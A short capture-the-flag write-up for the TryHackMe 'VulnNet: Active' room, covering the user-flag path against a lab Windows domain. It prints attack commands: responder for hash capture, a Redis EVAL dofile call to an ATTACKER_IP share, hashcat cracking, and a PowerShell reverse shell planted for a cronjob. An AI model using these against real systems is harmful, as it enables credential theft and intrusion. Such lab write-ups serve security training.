VulnNet: Active

https://tryhackme.com/room/vulnnetactive

User flag

We start with an nmap scan as usual.

Let's connect to the rpc client and see if we can enumerate the users.

No luck. Next step is enumerating smb.

Nothing. What if we try enum4linux?

Still nothing worthy. We can try to get the domain name with crackmapexec though.

crackmapexec smb IP

After that we can connect to redis and see if we find something interesting.

Get the config.

We find a username in the config.

In some redis versions que can execute the EVAL command. Let's try to get the user flag that way and see if it works.

Source:

Page not found - HackTricksbook.hacktricks.xyz

Now we can use responder and see if we're able to get a hash.

sudo responder -I tun0 -rdwv

Let's execute again the following eval command

eval "dofile('//ATTACKER_IP//share')" 0

We captured a hash.

Let's save the hash and crack it using hashcat.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

Now we can try to enumerate smb again with the user and creds we found.

Let's check what's inside Enterprise-Share.

We can assume there's a cronjob executing the file. We can try to upload a reverse shell with the name "PurgeIrrelevantData_1826.ps1" and see if we're lucky.

We can use the famous Invoke-PowerShellTcp.ps1 shell. Edit the file adding this line to the bottom:

Invoke-PowerShellTcp -Reverse -IPAddress YOUR_IP -Port PORT

Start a listener.

We are in. We can check the user flag again.

Root flag

After a while trying to abuse those privileges we got nothing.

Let's use sharphound to enumerate the machine.

Download the zip and fire up Bloodhound to see if we find something useful.

Coming soon...